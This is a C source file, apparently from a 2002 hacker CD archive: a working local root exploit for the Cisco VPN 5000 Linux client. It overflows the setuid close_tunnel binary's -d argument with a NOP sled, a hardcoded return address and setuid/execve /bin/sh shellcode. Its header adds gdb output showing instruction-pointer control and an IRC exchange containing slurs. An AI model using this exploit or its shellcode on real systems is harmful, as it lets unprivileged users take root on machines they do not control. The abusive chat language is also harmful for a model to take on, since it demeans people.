home *** CD-ROM | disk | FTP | other *** search
/ H4CK3R 14 / hacker14.iso / exploits / cisco / ES-cisco-vpn.c < prev    next >
Encoding:
C/C++ Source or Header  |  2002-10-22  |  3.0 KB  |  104 lines
  1. /*
  2. * [ElectronicSouls] Local Root Exploit for Cisco VPN 5000 Client
  3. * (C) BrainStorm - 2002
  4. *
  5. * Program received signal SIGSEGV, Segmentation fault.
  6. * 0x41414141 in ?? ()
  7. * (gdb) i r
  8. * eax            0xffffffff       -1
  9. * ecx            0x0      0
  10. * edx            0x0      0
  11. * ebx            0x4015c154       1075167572
  12. * esp            0xbfffdb70       0xbfffdb70
  13. * ebp            0x41414141       0x41414141
  14. * esi            0x400168e4       1073834212
  15. * edi            0xbfffdbf4       -1073751052
  16. * eip            0x41414141       0x41414141
  17. * eflags         0x10286  66182
  18. *
  19. * as you can see %eip got filled with 0x41 ;)
  20. *
  21. * tested:
  22. *         - on release 5.1.5
  23. *         - from package: vpn-5000-linux-5.1.5-des-k8.tar.Z
  24. *         - system RedHat Linux 7.2 / x86
  25. *
  26. * Bug Information:
  27. *  There are multiple unchecked buffers in the code which allow
  28. *  arbitrary code to be executed with root privileges.
  29. *  this is due to insufficient bounds checking.
  30. *  the result is a classic command line buffer overflow condition.
  31. *  This should be exploitable on Linux/Solaris.
  32. *
  33. * IRC:
  34. *  <BrainStor> a standard cmd line buffer overflow in the -d option
  35. *  <BrainStor> close_tunnel is set +s by default
  36. *  <v0id> tsk tsk tsk, cisco making errors like that
  37. *  <v0id> fucking stupid cunts
  38. *  <BrainStor> yea
  39. *  <BrainStor> its ubeliveable
  40. *  <v0id> man, standard buffer overflow should be practiclly non existant 
  41. these days
  42. *  <v0id> oh well
  43. *  <BrainStor> indeed
  44. *  <BrainStor> but its good tho ;)
  45. */
  46.  
  47. #include <stdio.h>
  48. #include <unistd.h>
  49.  
  50. #define B       2504
  51. #define N       0x90
  52. #define R       0xbfffefc0                                                // 
  53. may needs to be changed deppending on the distro/os..
  54. #define BIN     "/bin/close_tunnel"                                       // 
  55. you maybe want to change this too =P
  56.                                                                           // 
  57. /usr/local/bin/close_tunnel or so..
  58. char shell[] = "HELO"                                                     // 
  59. yes this is a valid x86 instruction ;)
  60.                "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"                         // 
  61. setuid();
  62.                "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
  63.                "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
  64.                "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
  65.  
  66.  
  67. int main(int argc, char **argv[])
  68. {
  69.   int ret, off, es;
  70.  
  71.   char bof[B];
  72.  
  73.     printf("\n\n");
  74.     printf("       [ElectronicSouls]       \n");
  75.     printf(" Cisco VPN 5000 client exploit \n");
  76.     printf("        (C) BrainStorm       \n\n");
  77.  
  78.     if(argv[1] == NULL) {
  79.        off = 0;
  80.        ret = R; }
  81.  
  82.     else {
  83.        off = atoi(argv[1]);
  84.        ret = atoi(argv[2])+off; }
  85.  
  86.     for (es = 0; es < B; es += 4 )
  87.        *(long *) &bof[es] = ret;
  88.  
  89.     printf("+ return address: 0x%lx \n",ret);
  90.  
  91.     for (es = 0; es < (B - strlen(shell) - 36); ++es)
  92.        *(bof+es) = N;
  93.  
  94.     memcpy(bof+es, shell, strlen(shell));
  95.  
  96.     printf("+ overflowing the buffer..\n\n\n");
  97.  
  98.     execl(BIN,BIN,"-d",bof,0);       // b00m!
  99.  
  100.   return(0);
  101. }
  102.  
  103.  
  104.